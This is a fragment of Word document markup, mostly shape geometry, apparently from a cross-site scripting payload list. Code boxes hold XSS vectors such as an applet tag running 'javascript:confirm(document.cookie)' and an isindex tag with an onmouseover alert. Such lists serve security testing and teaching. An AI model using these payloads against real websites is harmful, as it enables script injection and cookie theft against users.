                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1055 1007"/>
                            <a:gd name="T11" fmla="*/ 1055 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1035 1007"/>
                            <a:gd name="T15" fmla="*/ 1035 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1028 1007"/>
                            <a:gd name="T19" fmla="*/ 1028 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1007 1007"/>
                            <a:gd name="T23" fmla="*/ 1007 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1007 1007"/>
                            <a:gd name="T27" fmla="*/ 1007 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1032 1007"/>
                            <a:gd name="T31" fmla="*/ 1032 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1035 1007"/>
                            <a:gd name="T35" fmla="*/ 1035 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1056 1007"/>
                            <a:gd name="T39" fmla="*/ 105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DD7FB" id="Freeform 161" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:50.35pt;width:2.45pt;height:2.45pt;z-index:-1548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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,670560;13335,670560;11430,669925;0,657225;0,652780;13335,639445;17780,639445;31115,655320;31115,657225;17780,6705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3104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593090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1805940" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="157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5940" cy="116205"/>
                          <a:chOff x="1930" y="934"/>
                          <a:chExt cx="2844" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="158" name="Freeform 160"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="934"/>
                            <a:ext cx="2844" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4752 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 2844"/>
                              <a:gd name="T2" fmla="+- 0 1117 934"/>
                              <a:gd name="T3" fmla="*/ 1117 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 2844"/>
                              <a:gd name="T6" fmla="+- 0 1117 934"/>
                              <a:gd name="T7" fmla="*/ 1117 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 2844"/>
                              <a:gd name="T10" fmla="+- 0 1116 934"/>
                              <a:gd name="T11" fmla="*/ 1116 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 2844"/>
                              <a:gd name="T14" fmla="+- 0 1096 934"/>
                              <a:gd name="T15" fmla="*/ 1096 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 2844"/>
                              <a:gd name="T18" fmla="+- 0 1092 934"/>
                              <a:gd name="T19" fmla="*/ 1092 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 2844"/>
                              <a:gd name="T22" fmla="+- 0 955 934"/>
                              <a:gd name="T23" fmla="*/ 955 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 2844"/>
                              <a:gd name="T26" fmla="+- 0 934 934"/>
                              <a:gd name="T27" fmla="*/ 934 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4752 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 2844"/>
                              <a:gd name="T30" fmla="+- 0 934 934"/>
                              <a:gd name="T31" fmla="*/ 934 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4773 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 2844"/>
                              <a:gd name="T34" fmla="+- 0 955 934"/>
                              <a:gd name="T35" fmla="*/ 955 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4773 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 2844"/>
                              <a:gd name="T38" fmla="+- 0 1096 934"/>
                              <a:gd name="T39" fmla="*/ 1096 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4755 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 2844"/>
                              <a:gd name="T42" fmla="+- 0 1116 934"/>
                              <a:gd name="T43" fmla="*/ 1116 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4752 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 2844"/>
                              <a:gd name="T46" fmla="+- 0 1117 934"/>
                              <a:gd name="T47" fmla="*/ 111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844" h="183">
                                <a:moveTo>
                                  <a:pt x="2822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822" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2843" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2843" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2825" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2822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934"/>
                            <a:ext cx="284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&lt;Input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0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value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9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9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"XSS"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9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type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9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9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text&gt;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8" o:spid="_x0000_s2187" style="position:absolute;margin-left:96.5pt;margin-top:46.7pt;width:142.2pt;height:9.15pt;z-index:-15485440;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,934" coordsize="284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">
                <v:shape id="Freeform 160" o:spid="_x0000_s2188" style="position:absolute;left:1930;top:934;width:2844;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="284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SZXsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUsDMRCF74L/IYzgRdpshVpZm5a2IFYPha4Fr+Nm&#10;3CzdTJYkbtd/7xwEbzO8N+99s1yPvlMDxdQGNjCbFqCI62Bbbgyc3p8nj6BSRrbYBSYDP5Rgvbq+&#10;WmJpw4WPNFS5URLCqUQDLue+1DrVjjymaeiJRfsK0WOWNTbaRrxIuO/0fVE8aI8tS4PDnnaO6nP1&#10;7Q0chtedm39s3kKlX+4WexvzeftpzO3NuHkClWnM/+a/670V/LnQyj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5SZXsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m2822,183l21,183r-3,-1l,162r,-4l,21,21,,2822,r21,21l2843,162r-18,20l2822,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2822,1117;21,1117;18,1116;0,1096;0,1092;0,955;21,934;2822,934;2843,955;2843,1096;2825,1116;2822,1117" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 159" o:spid="_x0000_s2189" type="#_x0000_t202" style="position:absolute;left:1930;top:934;width:284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fXb8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V9dv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&lt;Input</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-1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value</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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"XSS"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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type</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-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text&gt;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rPr>
          <w:sz w:val="8"/>
        </w:rPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="280" w:left="1460" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk3"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="16010752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1109980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>4712970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="156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7471 7422"/>
                            <a:gd name="T3" fmla="*/ 7471 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 7471 7422"/>
                            <a:gd name="T7" fmla="*/ 7471 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 7470 7422"/>
                            <a:gd name="T11" fmla="*/ 7470 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 7450 7422"/>
                            <a:gd name="T15" fmla="*/ 7450 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 7443 7422"/>
                            <a:gd name="T19" fmla="*/ 7443 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 7422 7422"/>
                            <a:gd name="T23" fmla="*/ 7422 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 7422 7422"/>
                            <a:gd name="T27" fmla="*/ 7422 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 7446 7422"/>
                            <a:gd name="T31" fmla="*/ 7446 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 7450 7422"/>
                            <a:gd name="T35" fmla="*/ 7450 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 7471 7422"/>
                            <a:gd name="T39" fmla="*/ 747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53C7D" id="Freeform 157" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:371.1pt;width:2.45pt;height:2.45pt;z-index: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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,4744085;13335,4744085;11430,4743450;0,4730750;0,4726305;13335,4712970;17780,4712970;31115,4728210;31115,4730750;17780,4744085" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:position w:val="2"/>
          <w:sz w:val="4"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="5080" t="3810" r="1905" b="3175"/>
                <wp:docPr id="154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15" cy="31115"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="49" cy="49"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="155" name="Freeform 15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" cy="49"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 28 w 49"/>
                              <a:gd name="T1" fmla="*/ 49 h 49"/>
                              <a:gd name="T2" fmla="*/ 21 w 49"/>
                              <a:gd name="T3" fmla="*/ 49 h 49"/>
                              <a:gd name="T4" fmla="*/ 18 w 49"/>
                              <a:gd name="T5" fmla="*/ 48 h 49"/>
                              <a:gd name="T6" fmla="*/ 0 w 49"/>
                              <a:gd name="T7" fmla="*/ 28 h 49"/>
                              <a:gd name="T8" fmla="*/ 0 w 49"/>
                              <a:gd name="T9" fmla="*/ 21 h 49"/>
                              <a:gd name="T10" fmla="*/ 21 w 49"/>
                              <a:gd name="T11" fmla="*/ 0 h 49"/>
                              <a:gd name="T12" fmla="*/ 28 w 49"/>
                              <a:gd name="T13" fmla="*/ 0 h 49"/>
                              <a:gd name="T14" fmla="*/ 49 w 49"/>
                              <a:gd name="T15" fmla="*/ 24 h 49"/>
                              <a:gd name="T16" fmla="*/ 49 w 49"/>
                              <a:gd name="T17" fmla="*/ 28 h 49"/>
                              <a:gd name="T18" fmla="*/ 28 w 49"/>
                              <a:gd name="T19" fmla="*/ 49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28" y="49"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="49"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2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8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="24"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="28"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28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8705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6F6F20" id="Group 155" o:spid="_x0000_s1026" style="width:2.45pt;height:2.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 156" o:spid="_x0000_s1027" style="position:absolute;width:49;height:49;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="49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hGQsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQRvNauwraxGEa1QaC9dBa/DZtys&#10;JpNlk+rWX98UCt7m8T5nseqdFVfqQuNZwWScgSCuvG64VnDY755nIEJE1mg9k4IfCrBaDp4WWGh/&#10;4y+6lrEWKYRDgQpMjG0hZagMOQxj3xIn7uQ7hzHBrpa6w1sKd1ZOs+xFOmw4NRhsaWOoupTfTsFn&#10;o+/3bPNxnr3lx9dgSrsOW6vUaNiv5yAi9fEh/ne/6zQ/z+HvmXS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CEZCwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                  <v:fill opacity="57054f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="28,49;21,49;18,48;0,28;0,21;21,0;28,0;49,24;49,28;28,49" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="67"/>
          <w:position w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:noProof/>
          <w:spacing w:val="67"/>
          <w:position w:val="-3"/>
          <w:lang w:val="tr-TR" w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2823845" cy="116205"/>
                <wp:effectExtent l="0" t="6985" r="5080" b="635"/>
                <wp:docPr id="151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3845" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4447" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="152" name="Freeform 15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447" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 4426 w 4447"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 4447"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 4447"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 4447"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 4447"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 4447"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 4447"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 4426 w 4447"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 4447 w 4447"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 4447 w 4447"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 4429 w 4447"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 4426 w 4447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447" h="183">
                                <a:moveTo>
                                  <a:pt x="442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426" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4447" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4447" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4429" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442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44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&lt;applet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code="javascript:confirm(document.cookie);"&gt;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2" o:spid="_x0000_s2190" style="width:222.35pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="444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">
                <v:shape id="Freeform 154" o:spid="_x0000_s2191" style="position:absolute;width:4447;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="444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re58UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0Pywi9iG6a+oyu0haKngomIh7H7JiE&#10;ZmdDdqtpf323UPA2H99zVpvO1OJKrassK3gaRSCIc6srLhQcsvfhHITzyBpry6Tgmxxs1g+9FSba&#10;3nhP19QXIoSwS1BB6X2TSOnykgy6kW2IA3exrUEfYFtI3eIthJtaxlE0lQYrDg0lNvRWUv6ZfhkF&#10;i9P4+fQx1j/pNj7ns+Nrkw3SiVKP/e5lCcJT5+/if/dOh/mTGP6eCR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Ct7nxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m4426,182l21,182r-3,l,161r,-3l,21,21,,4426,r21,21l4447,161r-18,21l4426,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4426,182;21,182;18,182;0,161;0,158;0,21;21,0;4426,0;4447,21;4447,161;4429,182;4426,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 153" o:spid="_x0000_s2192" type="#_x0000_t202" style="position:absolute;width:444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/ghc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/ghc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&lt;applet</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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code="javascript:confirm(document.cookie);"&gt;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EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr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3411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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="150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91 242"/>
                            <a:gd name="T3" fmla="*/ 291 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 291 242"/>
                            <a:gd name="T7" fmla="*/ 291 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 290 242"/>
                            <a:gd name="T11" fmla="*/ 290 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 270 242"/>
                            <a:gd name="T15" fmla="*/ 270 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 263 242"/>
                            <a:gd name="T19" fmla="*/ 263 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 242 242"/>
                            <a:gd name="T23" fmla="*/ 242 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 242 242"/>
                            <a:gd name="T27" fmla="*/ 242 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 266 242"/>
                            <a:gd name="T31" fmla="*/ 266 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 270 242"/>
                            <a:gd name="T35" fmla="*/ 270 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 291 242"/>
                            <a:gd name="T39" fmla="*/ 29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D51A9" id="Freeform 151" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:12.1pt;width:2.45pt;height:2.45pt;z-index:-15482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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,184785;13335,184785;11430,184150;0,171450;0,167005;13335,153670;17780,153670;31115,168910;31115,171450;17780,18478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3462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107315</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2715895" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="147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5895" cy="116205"/>
                          <a:chOff x="1930" y="169"/>
                          <a:chExt cx="4277" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="148" name="Freeform 150"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="169"/>
                            <a:ext cx="4277" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6186 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 4277"/>
                              <a:gd name="T2" fmla="+- 0 351 169"/>
                              <a:gd name="T3" fmla="*/ 351 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 4277"/>
                              <a:gd name="T6" fmla="+- 0 351 169"/>
                              <a:gd name="T7" fmla="*/ 351 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 4277"/>
                              <a:gd name="T10" fmla="+- 0 351 169"/>
                              <a:gd name="T11" fmla="*/ 351 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 4277"/>
                              <a:gd name="T14" fmla="+- 0 330 169"/>
                              <a:gd name="T15" fmla="*/ 330 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 4277"/>
                              <a:gd name="T18" fmla="+- 0 327 169"/>
                              <a:gd name="T19" fmla="*/ 327 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 4277"/>
                              <a:gd name="T22" fmla="+- 0 190 169"/>
                              <a:gd name="T23" fmla="*/ 190 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 4277"/>
                              <a:gd name="T26" fmla="+- 0 169 169"/>
                              <a:gd name="T27" fmla="*/ 169 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6186 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 4277"/>
                              <a:gd name="T30" fmla="+- 0 169 169"/>
                              <a:gd name="T31" fmla="*/ 169 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6207 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 4277"/>
                              <a:gd name="T34" fmla="+- 0 190 169"/>
                              <a:gd name="T35" fmla="*/ 190 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6207 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 4277"/>
                              <a:gd name="T38" fmla="+- 0 330 169"/>
                              <a:gd name="T39" fmla="*/ 330 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6189 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 4277"/>
                              <a:gd name="T42" fmla="+- 0 351 169"/>
                              <a:gd name="T43" fmla="*/ 351 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6186 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 4277"/>
                              <a:gd name="T46" fmla="+- 0 351 169"/>
                              <a:gd name="T47" fmla="*/ 35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277" h="183">
                                <a:moveTo>
                                  <a:pt x="425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256" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4277" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4277" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4259" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="425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9"/>
                            <a:ext cx="427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&lt;isindex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0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x="javascript:"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onmouseover="alert(XSS)"&gt;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" o:spid="_x0000_s2193" style="position:absolute;margin-left:96.5pt;margin-top:8.45pt;width:213.85pt;height:9.15pt;z-index:-15481856;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,169" coordsize="427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">
